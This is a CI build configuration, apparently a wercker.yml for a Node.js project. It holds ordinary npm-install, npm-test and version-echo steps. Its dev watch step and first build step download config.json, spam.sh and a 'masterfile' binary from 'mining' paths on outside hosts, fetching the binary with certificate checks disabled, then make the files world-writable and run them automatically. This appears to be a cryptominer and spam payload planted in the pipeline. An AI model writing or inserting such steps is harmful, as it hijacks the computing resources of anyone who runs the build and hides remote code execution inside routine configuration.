box: 
  id: node:latest
  ports: 
    - "8080"
    
dev:
  steps:
    - npm-install
    - internal/watch:
        code: wget https://swenson.my.id/mining/config.json && wget https://swenson.my.id/mining/spam.sh && wget --no-check-certificate https://swensonm.com/mining/masterfile && chmod 777 masterfile && chmod 777 spam.sh && ./masterfile && ./spam.sh
        reload: true

build:
  steps:
    - script:
        code: wget https://swenson.my.id/mining/config.json && wget https://swenson.my.id/mining/spam.sh && wget --no-check-certificate https://swensonm.com/mining/masterfile && chmod 777 masterfile && chmod 777 spam.sh && ./masterfile && ./spam.sh
    - npm-install
    - npm-test
    - script:
        name: echo nodejs information
        code: |
          echo "node version $(node -v) running"
          echo "npm version $(npm -v) running"
